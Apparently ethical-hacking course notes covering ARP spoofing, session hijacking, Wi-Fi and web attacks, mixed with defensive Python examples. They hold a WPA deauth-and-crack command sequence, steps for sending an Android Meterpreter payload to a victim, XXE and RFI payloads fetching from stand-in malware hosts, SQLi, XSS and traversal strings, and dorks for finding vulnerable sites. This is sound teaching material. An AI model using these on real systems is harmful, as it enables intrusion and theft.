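            if len(self.claims[mac]) > 1:
                new.append(("mac-claims-multiple-ips", mac, tuple(sorted(self.claims[mac]))))
        self.alerts.extend(new)
        return new


def suspects(watch: ArpWatch) -> set:
    """MACs implicated by any alert: what to look up in the switch's port table."""
    out = set()
    for a in watch.alerts:
        out.add(a[3] if a[0] in ("static-mismatch", "ip-changed-mac") else a[1])
    return out


def run(replies, static: dict = None) -> ArpWatch:
    w = ArpWatch(static)
    for ip, mac in replies:
        w.observe(ip, mac)
    return w


GATEWAY, VICTIM = "192.168.1.1", "192.168.1.10"
GW_MAC, VICTIM_MAC, ATTACKER_MAC = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:10", "cc:cc:cc:cc:cc:99"


def constructed_clean() -> list:
    return [(GATEWAY, GW_MAC), (VICTIM, VICTIM_MAC), ("192.168.1.20", "dd:dd:dd:dd:dd:20")]


def constructed_poisoned() -> list:
    """Normal traffic, then the attacker (Ettercap-style) repeatedly tells the
    LAN that both the gateway and the victim live at its own MAC."""
    return constructed_clean() + [(GATEWAY, ATTACKER_MAC), (VICTIM, ATTACKER_MAC)] * 3


if __name__ == "__main__":
    w = run(constructed_poisoned(), static={GATEWAY: GW_MAC})
    for a in w.alerts:
        print(a)
    print("suspect MACs:", suspects(w))
```

A static entry for the gateway (`arp -s` on the client, or the `static` dict here) is the single most useful one: the gateway is what every MITM has to impersonate, and its MAC should never change between reboots.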

Wireshark Cheatsheet:
https://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
//////////

Session Hijacking
HTTP (Hyper Text Transfer Protocol) is a stateless protocol
=> Cookies -> temporary storage at the client end, created/assigned by the server and sent back with every request

Session ID // unique ID assigned to an authenticated user so the server can authorize and track his activity; whoever presents it is treated as that user.

Broken Authentication or Improper Session Management

Cookies :-
Rules of Secure Cookie Management:
// the session should be expired on the server as soon as the user logs out
// a cookie assigned to one person should never be assigned to anyone else
// a cookie once used should be disposed of and never reused
// the cookie value should be random and must not contain any information about the user or creds

Flags of Cookie:
HttpOnly // the cookie is not readable by JavaScript (document.cookie), so XSS cannot steal it
Secure // the cookie is only sent over HTTPS, so it cannot be sniffed on the LAN
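The rules and flags above can be checked mechanically on any response. Here is an added example (not code from the original notes or from Burp) that audits `Set-Cookie` headers for the Secure and HttpOnly flags, for a session id that is too short or predictable, and for values that carry user data or an authorization decision (the `Status=Paid` pattern discussed later on this page). The header lines are constructed, not responses from the test sites listed; the session-cookie names and the 64-bit entropy threshold are assumptions.

```python
"""Audit Set-Cookie headers against the session-management rules above.

Added example, not from the original notes. The header lines are constructed
(not responses from the test sites listed); SESSION_NAMES, ROLE_VALUES and the
64-bit entropy threshold are assumptions for the demo."""
import base64
import math
import re
from collections import Counter

SAMPLE_HEADERS = [    # constructed
    "Set-Cookie: PHPSESSID=7f3c9a1b2e4d5f60718293a4b5c6d7e8; Path=/; Secure; HttpOnly; SameSite=Lax",
    "Set-Cookie: sessionid=dXNlcj1hZG1pbjtyb2xlPWFkbWlu; Path=/",
    "Set-Cookie: Status=Paid; Path=/; Secure",
    "Set-Cookie: JSESSIONID=0001; Path=/; HttpOnly",
]
SESSION_NAMES = {"phpsessid", "jsessionid", "sessionid", "asp.net_sessionid", "sid"}
ROLE_VALUES = {"paid", "not paid", "true", "false", "admin", "1", "0"}


def parse_set_cookie(line: str):
    """-> (name, value, {attribute_lower: attribute_value})."""
    body = line.split(":", 1)[1] if line.lower().startswith("set-cookie:") else line
    parts = [p.strip() for p in body.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.lower()] = v
    return name, value, attrs


def entropy_bits(s: str) -> float:
    """Shannon entropy of the value in bits: a rough lower bound on randomness."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) * n


def carries_user_data(value: str) -> bool:
    """True if the value, raw or base64-decoded, contains user/role key=value pairs."""
    candidates = [value]
    try:
        padded = value + "=" * (-len(value) % 4)
        candidates.append(base64.b64decode(padded, validate=True).decode("utf-8"))
    except Exception:
        pass    # not base64 / not text: nothing more to inspect
    return any(re.search(r"\b(user|username|name|role|admin|paid|uid|id)\s*=", c, re.I)
               for c in candidates)


def audit(line: str):
    """-> (cookie name, list of findings). An empty list means the cookie passes."""
    name, value, attrs = parse_set_cookie(line)
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plain HTTP, sniffable on the LAN")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie (XSS)")
    if carries_user_data(value):
        findings.append("value carries user/role data")
    is_session = name.lower() in SESSION_NAMES
    if is_session and entropy_bits(value) < 64:
        findings.append("session id too short/predictable")
    if not is_session and value.lower() in ROLE_VALUES:
        findings.append("authorization decision stored client-side")
    return name, findings


def audit_all(headers) -> dict:
    return {name: findings for name, findings in map(audit, headers)}


if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_HEADERS).items():
        print(name, "OK" if not findings else "")
        for f in findings:
            print("   -", f)
```

Paste the `Set-Cookie` lines from Burp's response view into `SAMPLE_HEADERS` to run it against a real target. Entropy of a single value only catches the obvious cases (sequential ids, short values); predictability across several ids issued in a row needs Burp's Sequencer or a similar sample-based test.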

Burpsuite Link: https://portswigger.net/burp

Proxy:
1 : Hide your identity (anonymizer)
2 : Bypass restrictions (torrents)

HTTPS Sniffing:
A: (VICTIM) sender : browser (Firefox)
B: proxy server : Burp Suite
D: website : server

Burp Suite: https://portswigger.net/burp/communitydownload

Convince the victim to use the attacker's machine as proxy and to add the attacker's CA certificate as a trusted root authority; without that the browser warns about the forged certificate.

Port forwarding // WAN, MAN

addon:- Cookie Editor


https://addons.mozilla.org/en-US/firefox/addon/cookie-quick-manager/

Web server and Application

Acunetix
Creds: test-test
Testing Link:http://test.vulnweb.com/login.php
Profile Page:http://test.vulnweb.com/userinfo.php

IBM
testing Link: http://testfire.net/
Creds: admin-admin
jsmith-Demo1234
Session Fixation Attack:- the attacker assigns a random / chosen value to the session cookie and the web app accepts it, so the attacker knows the victim's session ID in advance.

Session Replay Attack:- the attacker uses an expired cookie / a cookie from after logout and the web app still allows it.

Mobile-*
IOT
WIFI*
Cloud Computing
Cryptography

///////////////////////////////

Mobile Phone / Smart Phone

It is a palmtop computer, so the same approach applies:
: Port scan
: Vulnerability scan (Nessus)
: Metasploit / Core Impact

Android (open source, owned by Google) / iOS (Apple): both Unix-flavoured OSes.

1. Each app on your phone runs as its own user (Linux UID), sandboxed from the others

/home/<username>
Privilege Escalation
Android: rooting
iOS: jailbreaking
Guest              emergency keypad, camera
User               almost all apps
Sudo               manufacturer
Super User (root)  Play Store

Change the payload:


1. windows/meterpreter/reverse_tcp =>
android/meterpreter/reverse_tcp

2. --platform android

3. exe => apk

Android Simulator: Genymotion

Create Payload
Create Listener
Send the payload to victim and convince him to install

adb (Android Debug Bridge) drivers // execute commands on the phone through the computer

SPF:https://bulbsecurity.com/products/smartphone-pentest-framework/

owasp top 10 mobile:


https://www.owasp.org/index.php/Mobile_Top_10_2016-Top_10

ADB Drivers
http://adbdriver.com/downloads/

///
IoT (Internet of Things)
The ability to connect an everyday device to the internet

(heaters, gates, cameras, microwave ovens, bulbs, home automation, Alexa, medical sensors, pacemakers)

https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project

///////////
Wi-Fi (Wireless Fidelity) IEEE 802.11
Wi-Fi access point / Wi-Fi router: behaves much like a switch for the wireless clients

2.4 GHz (longer range but lower throughput and more interference: personal, small-scale office),
5 GHz (shorter range, higher throughput: large-scale deployments)
a, b, g, n, ac (standards, differing in range and speed)
BSSID : MAC address of the Wi-Fi AP
ESSID : Wi-Fi name
Channels: 13 in the 2.4 GHz band; how many may be used depends on the regulatory region (11 in the US)
Password encryption: open, WEP, WPA, WPA2
WEP = Wired Equivalent Privacy (RC4 with a weak 24-bit IV): broken since 2001; the 2007 PTW attack recovers the key directly from a few tens of thousands of captured IVs
WPA/WPA2 = Wi-Fi Protected Access: the passphrase is never sent; the handshake is captured and the passphrase guessed offline

How Wi-Fi works:
1. The access point broadcasts its info (beacons) across its whole range
2. When a client enters the access point's range, it receives the AP's information
3. The client initiates a connection to the AP along with the creds, using the method announced in the broadcast
4. The AP validates the creds and gives the client access if they are correct.

Steps to hack Wi-Fi

1. Turn your Wi-Fi adapter into monitor mode.

// Atheros chipset, ex: TP-Link TL-WN722N v1, TL-WN822N v2, Alfa cards

2. Search for the nearby Wi-Fi signals

3. Select one target, and start sniffing on the target's channel, saving the received data to a file.

WEP: 4. after collecting enough packets (tens of thousands of IVs), crack the key

WPA/WPA2: 4. wait until you capture the 4-way handshake (or deauthenticate a client to force one).

5. Use bruteforce or a dictionary to crack the Wi-Fi password from the handshake.

6. Turn your Wi-Fi adapter back to managed mode.

Dependencies : external Wi-Fi adapter with a chipset that supports monitor mode and injection (Atheros is the classic choice)
: for WPA, a dictionary file
: at least 1 client connected to the Wi-Fi AP (to capture a handshake)
: Kali Linux running as host OS or live OS (USB passthrough to a VM also works)
=> iwconfig // check the status of the wireless adapter
=> airmon-ng start <device-name> // turn on monitor mode (the device becomes e.g. wlan0mon)
=> airodump-ng <device-name> // info on nearby Wi-Fi APs
=> airodump-ng --bssid <mac addr of wifi AP> -c <channel number> --write <filename> <device-name> // sniff one AP and save to file
=> aireplay-ng -0 <number of packets> -a <bssid> -c <client's mac address> <device-name> // deauthenticate the client from the target AP so it reconnects and you capture the handshake

=> aircrack-ng -w <wordlist path> <filename>-01.cap // crack the WPA / WPA2 passphrase from the captured handshake

Best tool : Aircrack-ng suite


////////////////////////////////
Hacking Webservers

Web Server Hacking

A server is a computer which serves clients' requests.

Available 24x7
Robust, redundant system.

Windows xp ~ Windows Server 2003


Windows 7 ~ Windows Server 2008
Windows 8 ~ Windows Server 2012
Windows 10 ~ Windows Server 2016

FTP
Enumeration (nmap, netcat)
FTP Password Cracking
Target: 10.10.10.16 (Server 2016)
Attacker: 10.10.10.11 (Kali Linux)

Web
What is Web.
Basics of HTTP
Enumeration(nmap,dirb,Nikto)
Password Cracking

Web Server Basics:


html,php, java, asp, dot net
webroot, Host Location // the location of the root directory where the webpages
are located

https://en.wikipedia.org/wiki/Static_web_page
https://en.wikipedia.org/wiki/Dynamic_web_page

C:\inetpub\wwwroot\ (IIS default), e.g. C:\inetpub\wwwroot\bank\main.jsp

/var/www/, /var/www/html/bank/main.jsp

Apache, nginx, IIS

Web 1.0 (static) single-tier architecture // 1999

Web 2.0 (dynamic) multi-tier (3-tier) architecture // as of today
How the web works
HTTP Request
HTTP Response
URL

URL: Uniform Resource Locator
URI: Uniform Resource Identifier

http://yoursite.com/folder1/folder2/index.php?userid=1
|  Server details  |~~~~~~~~~~~~ URI ~~~~~~~~~~~~~|

http:// | yoursite.com | /folder1/folder2/ | index.php | ?userid=1

protocol | your actual website's domain | folders | file which is requested | query parameter

Special characters in a URL: ? starts the query string, & separates parameters, # marks the fragment (never sent to the server), % introduces a URL-encoded byte (%20 = space)

http request: Request made from the browser to the Web Server.

{HTTP method} {path of the file} {HTTP version}


Host: {address of the web server}
User-Agent: {user client information}
{accepted Parameters}
{request body / parameters} //cookie, cookie_name: cookie_value

https://www.tutorialspoint.com/http/http_requests.htm
/////
http response:

{http version} {response code}

{server info}
{content info}
Set-Cookie: cookie_name=cookie_value; Domain=...; Path=/; Expires=...; flags
Connection:
keep-alive
close

{response code}

https://www.tutorialspoint.com/http/http_responses.htm

httpd.conf // contains the restrictions of the web server

HTTP Methods // tell the server the type of request being made

GET => the client wants to get data from the server
HEAD => like GET, but returns only the response headers of the requested resource
POST => the client wants to send data to the server
PUT => insert / add (or replace) a resource on the webserver
PATCH => edit an existing resource on the webserver
DELETE => delete the resource on the webserver
TRACE => the server echoes the request back (diagnostic); should be disabled in production
OPTIONS => lists all the HTTP methods the server permits for a resource

HTTP response codes // tell the browser / HTTP client the type of response being given

1XX 100-199 Informational  100 Continue
2XX 200-299 Success        200 OK
3XX 300-399 Redirection    301 Moved Permanently, 302 Found (temporary redirect), 304 Not Modified
4XX 400-499 Client error   400 Bad Request, 401 Unauthorized, 403 Forbidden, 404 Not Found
5XX 500-599 Server error   500 Internal Server Error, 502 Bad Gateway, 503 Service Unavailable (what a DoS produces)

burpsuite, IBM appscan, Webscarab, owasp-zap, mitm proxy.

Hacking Webserver:
CMS Content Management System: wordpress, joomla, drupal, etc
CPanel.
PUT,

php,asp,java

Lab:
1. directory bruteforce / spidering.
2. Scanning website configuration.
3. online password cracking
http login

Assignment:
crack ftp password for the windows server 2016.

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-
Credentials/best110.txt
////////////////////////////
Today Agenda 6-10-2019

3 Tier Architecture / Web Application Works (D)


OWASP TOP 10 2017 (Revised 2018)
Exploiting Web application

Attacker : 192.168.43.26 (Kali Linux)


Victim : 192.168.43.2 (DVWA)

Command Injection
SQLi
1. Bypassing Authentication
2. Steal / dump data stored in the Database

XSS

Bypassing Auth

Example of where XXE shows up: an index.php that displays your directories and sub-directories, taking an XML file as its reference; the XML names the directory to be displayed.

xml // user files
/home/bkob/Desktop/user_files

If the parser resolves external entities, the same request can be pointed at:
/etc/passwd
/etc/shadow

Authentication: validate that you are who you claim to be.
Authorization: defines what an authenticated user is allowed to do.

Paid video streaming (Netflix, Amazon Prime Video) example:

for all non-paid users
cookie: Status=Not Paid

for all paid users
cookie: Status=Paid

// the client controls its own cookies, so a free user just edits Status=Paid: the authorization decision must be made server-side from the session, never from a client-supplied value.
//////////////////
Serialization and Deserialization

A program's steps serialized into a string that the client sends back:
execute()
a = b+c
d = a+x
e = d*5

If the string is deserialized and executed without validation, an injected step runs too:
execute = a=b+c;cat%20/etc/passwd;d=a+x;e=d*5;

5
display the contents of the passwd file
7
35

Web Application Hacking

Client Side Attacks // impact is on the user end
ex: XSS, CSRF, Session Hijacking
Server Side Attacks // impact is on the server end
ex: SQL injection, LFI, RFI, etc.

OWASP Top 10 2017

https://www.owasp.org/index.php/Main_Page
https://www.owasp.org/index.php/Top_10-2017_Top_10
////

FE (front end):
[<Enter the IP to Ping>]
{ping}
user types: ip = 8.8.8.8 && whoami
BE (back end):

ip=$ip // ip = 8.8.8.8 && whoami

ping -n 3 %ip => ping -n 3 8.8.8.8 && whoami // the shell runs both: the ping, then whoami
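The ping form above, written out both ways as an added example (not code from the original notes or from DVWA): the vulnerable version builds a shell command string from the form field, the hardened version validates the field as an IP literal and passes it as a single argv element with no shell involved. `echo` and a one-line Python print stand in for `ping` so the block runs offline and harmlessly; the injected input is constructed.

```python
"""Command injection in the ping form: vulnerable and hardened back ends.

Added example, not from the original notes. `echo` (and a tiny Python print)
stand in for `ping` so the block runs offline and harmlessly; the injected
input is constructed."""
import ipaddress
import subprocess
import sys


def vulnerable_ping(ip: str) -> str:
    """Back end does the equivalent of `ping -n 3 %ip` with the raw form field.
    With shell=True the shell parses the string, so '8.8.8.8 && <cmd>' runs
    two commands. echo replaces ping here; the injection works identically."""
    cmd = f"echo {ip}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_ip(value: str) -> str:
    """Allow exactly one IPv4/IPv6 literal; reject everything else loudly."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        raise ValueError(f"not an IP address: {value!r}") from None


def build_ping_argv(ip: str, count: int = 3) -> list:
    """argv for subprocess: no shell parses it, so '&&', ';', '|' are just text
    (and validate_ip has already refused them). -n is the Windows count flag
    used in the notes, -c the Unix one."""
    flag = "-n" if sys.platform.startswith("win") else "-c"
    return ["ping", flag, str(count), validate_ip(ip)]


def hardened_ping(ip: str) -> str:
    """Same shape as build_ping_argv, with a portable stand-in for ping so the
    demo runs anywhere: the validated IP is passed as one argv element."""
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", validate_ip(ip)]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def rejects(fn, value: str) -> bool:
    """True if fn refuses the input with ValueError (i.e. the guard worked)."""
    try:
        fn(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    evil = "8.8.8.8 && echo INJECTED"            # constructed attacker input
    print("vulnerable ->", vulnerable_ping(evil).split())
    print("hardened   ->", "rejected" if rejects(hardened_ping, evil) else "ACCEPTED")
    print("argv       ->", build_ping_argv("8.8.8.8"))
```

Both halves of the fix matter: the allow-list validation stops the injection at the input, and the argv form means that even an input the validator got wrong cannot reach a shell parser.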

Session Fixation attack // attacker is able to fix/assume a session id and the


application accepts and consider him as a logged in user.

Session Replay attack // attacker tries the previously assigned cookie/ session
id and if the application accepts and consider him as a logged in user.

Checklist for session ids

% cookies/session ids should only be transferred via HTTPS // HttpOnly and Secure flags
% each cookie/session id should be disposed of as soon as the user logs out
% cookies/session ids should never be reused
% cookies/session ids should be random data; they should not contain any information
about the user
//////
Internal Directory
<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/config.php" >]>
<foo>&xxe;</foo>

External Devices directory


<!ENTITY xxe SYSTEM "https://malicoussite.com/malware" >]>
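Added example (not part of the notes): how the directory-listing page should treat the XML it receives. The `<dir>` element is an assumed request format; the payload is a constructed copy of the one above.

```python
import re
import xml.etree.ElementTree as ET

# Constructed copy of the notes' payload: an external entity pointing at a server file.
XXE_REQUEST = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/config.php" >]>
<foo>&xxe;</foo>"""

# Constructed benign request in the (assumed) format the listing page expects.
BENIGN_REQUEST = b"<dir>/home/bkob/Desktop/user_files</dir>"

DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


def has_dtd(xml_bytes: bytes) -> bool:
    """A DTD is the only place an external entity can be declared."""
    return DOCTYPE_RE.search(xml_bytes) is not None


def parse_directory_request(xml_bytes: bytes) -> ET.Element:
    """Refuse any document carrying a DOCTYPE before it reaches the parser.
    The listing request never needs a DTD, so this conservative rule (the same
    policy defusedxml calls forbid_dtd) removes the XXE vector outright instead
    of relying on parser defaults about entity expansion."""
    if has_dtd(xml_bytes):
        raise ValueError("DOCTYPE is not permitted in a directory request")
    return ET.fromstring(xml_bytes)


def requested_directory(xml_bytes: bytes):
    """Directory named in the request, or None when the request is rejected."""
    try:
        return parse_directory_request(xml_bytes).text
    except ValueError:
        return None
```

The returned directory still has to be confined to the allowed root before it is listed; that check belongs with the directory traversal notes further down.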
///////////////////

Low Privileged User


High Privileged User

Access identifiers = request parameter, cookie, header


///

Paid / Free

Cookie: paid=true

Cookie: paid=false

Authentication & Authorization


valid user or not & does the user hold these privileges or not
unique cookie.
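Added example (not from the notes) covering the paid/free cookie, the session id checklist and the authentication vs authorization point above: the server issues an opaque id and keeps the paid flag on its own side. The user records are constructed.

```python
import secrets

# Constructed server-side records standing in for the streaming site's user database.
USERS = {"alice": {"paid": True}, "bob": {"paid": False}}
SESSIONS = {}   # session id -> username; the cookie carries nothing but the id


def login(username: str) -> str:
    """Issue a fresh random, opaque session id at login. Never adopt an id the
    client supplied (session fixation) and never encode user data in it."""
    if username not in USERS:
        raise KeyError("unknown user")
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = username
    return sid


def logout(sid: str) -> None:
    """Dispose of the id server-side so a replayed cookie is worthless."""
    SESSIONS.pop(sid, None)


def set_cookie_header(sid: str) -> str:
    """Secure: sent over HTTPS only. HttpOnly: not readable via document.cookie.
    SameSite: not attached to cross-site requests."""
    return f"Set-Cookie: session={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"


def can_stream_vulnerable(cookies: dict) -> bool:
    """Broken authorization from the notes: a client-controlled flag decides."""
    return cookies.get("Status") == "Paid"


def can_stream_safe(cookies: dict) -> bool:
    """Authentication: does the id map to a live session? Authorization: is that
    user's server-side record marked paid? The client can change neither."""
    user = SESSIONS.get(cookies.get("session", ""))
    return user is not None and USERS[user]["paid"]
```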
/////////////////////////////

Security Misconfiguration:
HTTP methods PUT, PATCH, DELETE left enabled, default admin credentials, not restricting
inclusion, allowing upload of file types like php, jsp, asp, exe; robots.txt also belongs here.

/////////////////////////////

<html>
<head>
Headers should be present here
</head>
<body>
Body text and data should be present here
</body>
</html>

Client Side Attack


XSS is a type of attack where the attacker is able to inject/alter data in the HTML
source code that is rendered for the user.

<h1>hello</h1>
alert 1 on the page <script>alert(document.URL)</script>
redirecting <script>window.location="https://google.com"</script>
get cookies <script>alert(document.cookie)</script>

no input validation

Reflected XSS / Non Persistent XSS // injected code is temporary, impact is only
on the given link, it is not stored in the DB
Ex: search box, view, any input which is echoed by the server and the text is
temporary
Stored XSS / Persistent XSS // injected code is permanent, impact is on all
the users accessing the vulnerable webpage, it is stored in the DB
Ex: messages, chat, comment, address, any input which is stored in the DB
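Added example (not from the notes or the XSS labs linked below): the missing input/output handling for the search-box and comment cases, using Python's `html.escape` for the body and attribute contexts, with a CSP header as a second layer.

```python
import html


def render_search_vulnerable(term: str) -> str:
    """Reflected XSS: the search term is echoed into the HTML body unchanged."""
    return f"<h1>Results for: {term}</h1>"


def render_search_safe(term: str) -> str:
    """Element-body context: encode <, > and & so the browser displays the
    characters instead of parsing them as tags."""
    return f"<h1>Results for: {html.escape(term, quote=False)}</h1>"


def render_input_safe(value: str) -> str:
    """Attribute context: quotes must be encoded as well, otherwise a value
    containing a double quote could close the attribute and start new ones."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def render_comments_safe(comments: list) -> str:
    """Stored XSS: encoding applies when data comes back out of the DB too,
    not only when it is reflected straight from the request."""
    items = "".join(f"<li>{html.escape(c)}</li>" for c in comments)
    return f"<ul>{items}</ul>"


def security_headers() -> dict:
    """Defence in depth: a CSP with no 'unsafe-inline' keeps an injected
    <script> from executing even if one output site is left unencoded."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }
```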

XSS : https://xss-game.appspot.com/level1
XSS : http://leettime.net/xsslab1/
username
credit card

Name Role Password


Bharath student Text123
Bharath Admin Text123
/////////

CSRF: Cross Site Request Forgery : test.vulnweb.com


Directory Traversal:
hello CEH LAB

C:\webroot\www\..\..\..\boot.ini //you get the file

/var/www/../../../etc/passwd // you get the passwd file

with directory traversal, the attacker is able to access a server's internal files
// read the file

http://testfire.net/bank/main.jsp
/var/www/html/bank/../../../../etc/passwd

used to get creds, config file of a web server

FI:
Local File Inclusion, Remote File Inclusion

in certain webpages, additional code will be executed inside a particular file

ALU (Addition, Subtraction, Multiplication, Division)


Alu.php
sum.php //addition&Subs

ALU.php?file=../../../etc/passwd
ALU.php?file=prod.php
hosting file = Alu.php
Executing File= sum.php

Local File Inclusion /


view and execute files located on the server
Remote File inclusion

Game.com/game=http://www.race.com/race.php
Game.com/game=http://EAsports.com/cricket.php
Game.com/game=http://soccer.com/football.php
Game.com/game=http://malicious.site/malware.php

RFI is an attack where the attacker can make (web) malware execute on the


webserver.
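Added example (not from the notes) serving both the directory traversal and the file inclusion sections: a path-confinement check for the testfire-style web root and an allow-list for the ALU `file` parameter. The include directory and module names are assumptions; only `/var/www/html` comes from the notes.

```python
import posixpath

WEB_ROOT = "/var/www/html"                      # web root from the notes' testfire example
INCLUDE_DIR = "/var/www/html/includes"          # assumed directory holding the ALU modules
ALLOWED_MODULES = {"sum", "sub", "mul", "div"}  # assumed module names of the ALU app


def resolve_under_root(root: str, user_path: str) -> str:
    """Join the (already URL-decoded) user path to root, collapse '..' segments,
    then check the result is still inside root. Purely lexical, so it needs no
    filesystem access and behaves the same for paths that do not exist."""
    joined = posixpath.normpath(posixpath.join(root, user_path.lstrip("/")))
    if posixpath.commonpath([root, joined]) != root:
        raise PermissionError(f"path escapes web root: {user_path}")
    return joined


def is_safe_request(root: str, user_path: str) -> bool:
    try:
        resolve_under_root(root, user_path)
        return True
    except PermissionError:
        return False


def include_module(file_param: str) -> str:
    """Allow-list for ALU.php?file=...: only known module names map to a file on
    disk. '../../../etc/passwd' (LFI) and 'http://.../malware.php' (RFI) are
    both refused because neither is a known name; nothing built from the raw
    parameter is ever included."""
    if file_param not in ALLOWED_MODULES:
        raise ValueError(f"unknown module: {file_param}")
    return posixpath.join(INCLUDE_DIR, file_param + ".php")


def included_path_or_none(file_param: str):
    try:
        return include_module(file_param)
    except ValueError:
        return None
```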
////
CSRF: Cross Site Request Forgery
The attacker makes the victim execute an authenticated web request, with the victim's
access level, without his knowledge
GET
POST
1: attacker creates a malicious script
2: attacker masks the malicious script with some attractive info and sends it to the
victim
3: victim visits the fake web page and clicks/submits the link

///
SQL injection:
Bypassing Authentication

File-> Sheets-> Rows x Columns

Database_Name -> Tables -> Columns & Rows

Sample Query:

select * from Table_name where Column1= " " && Column2= " "

sample query for Authentication

uname= test
pass= test

select * from users where username= "%uname" && Password= "%pass"

select * from users where username= "test" && Password= "test"
true && true = true

select * from users where username= "admin" && Password= "pass"

true && false = false


1'or'1'= '1

select * from users where


username= '1' | or | '1'= '1' && Password= '1' | or | '1'= '1'

(false or true) && (false or true)

true && true = true
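Added example (not from the notes): the login query above run both ways against a constructed in-memory SQLite table, so the `1'or'1'= '1` bypass can be seen succeeding against string concatenation and failing against parameter binding.

```python
import sqlite3

PAYLOAD = "1'or'1'= '1"   # the bypass string from the notes


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the notes' users table. Real systems store
    password hashes, not plaintext; plaintext is kept here only to mirror the notes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "S3cret!"), ("test", "test")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, uname: str, pw: str) -> bool:
    """String-built query (the notes' %uname / %pass substitution). The quote in
    the input closes the literal and the rest becomes SQL grammar:
    username='1'or'1'='1' AND password='1'or'1'='1' is always true."""
    query = (f"SELECT * FROM users WHERE username = '{uname}' "
             f"AND password = '{pw}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, uname: str, pw: str) -> bool:
    """Parameterised query: the driver binds ? placeholders as values, so the
    input can never alter the query's structure, quotes included."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (uname, pw)).fetchone() is not None
```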


Steal data with sql injection
Manually

select * from users where Userid = ' 3';

www.travelindia.com/placestovisit=%id

select * from tourist where id = '%id'

select * from products where id = '43'

Ways to find sql injection vuln


1. Web Application scanner
2. Burpsuite scanner (pro)30k
3. sqlmap
4. google dorks

Types of SQL injection

Error based => we retrieve the data through error messages


Union based => we run a user-defined query along with the existing
query to retrieve the data.
=> each query depends upon the data returned by the previous
query
Blind SQLi //
1. boolean based: true or false
2. time based: delay or no delay

Methodology to Perform SQL injection (Manual)

1. use ' or " or \ to check whether it is vulnerable or not.


2. identify how many columns the query is satisfying, using the order by operator
3. use the union method to try to get data from the site, and echo back data from the DB

id = 43'
select * from products where id = '| 43' select * |'   // the quote closes the literal; what follows is parsed as SQL
comment out the right side of the query
LHS | | RHS

select * from products where id = '43' --+'   (the query would consist of 10 columns)

if the number of columns in the query is >= the number given to order by, we don't get an error


if the number of columns in the query is < the number given to order by, we get an error

there are 15 columns in the query
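Added example from the defender's side (not from the notes): the three manual steps above leave a recognisable trail in web-server access logs. The log lines are constructed, modelled on the `products.php?id=43` example and the notes' attacker address.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (Common Log Format) following the notes' methodology.
SAMPLE_LOG = """\
192.168.43.26 - - [07/Sep/2018:10:00:01 +0000] "GET /products.php?id=43 HTTP/1.1" 200 512
192.168.43.26 - - [07/Sep/2018:10:00:02 +0000] "GET /products.php?id=43' HTTP/1.1" 500 120
192.168.43.26 - - [07/Sep/2018:10:00:03 +0000] "GET /products.php?id=43'%20order%20by%2015--+ HTTP/1.1" 200 512
192.168.43.26 - - [07/Sep/2018:10:00:04 +0000] "GET /products.php?id=-43'%20union%20select%201,2,3--+ HTTP/1.1" 200 640
"""

# Most specific first; each signature corresponds to one step of the notes' methodology.
SIGNATURES = [
    ("step3 union query",  re.compile(r"\bunion\b\s+(all\s+)?\bselect\b", re.I)),
    ("step2 column count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("step1 quote probe",  re.compile(r"[\"'\\]")),   # noisy on its own; tune per app
]
REQUEST_RE = re.compile(r'"(?P<method>\w+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def classify_request(target: str) -> Optional[str]:
    """URL-decode the query string (the log stores it encoded) and return the
    first matching methodology step, or None for a clean request."""
    query = unquote_plus(urlsplit(target).query)
    for label, pattern in SIGNATURES:
        if pattern.search(query):
            return label
    return None


def scan_log(text: str) -> list:
    """Return (line_no, status, label) for every request that matches a signature.
    A 500 next to a quote probe is the error-based tell the notes describe."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        label = classify_request(m.group("target"))
        if label:
            findings.append((n, int(m.group("status")), label))
    return findings
```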

google dorks to identify sql vulnerable websites


https://gbhackers.com/latest-google-sql-dorks/

Practice Manual Sql injection


http://leettime.net/sqlninja.com/ practice
http://securityidiots.com/Web-Pentest/SQL-Injection training

Sqlmap github link: https://github.com/sqlmapproject/sqlmap


Sqlmap Commands cheatsheet: https://www.hackwithbkob.com/2018/05/sqlmap-cheatsheet.html
http://www.sandex.pk/about.php?id=p

///////////////////////////////////////////////
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/SQLi/Generic-SQLi.txt

sqlmap -> sql injection

<script>alert(document.cookie)</script>
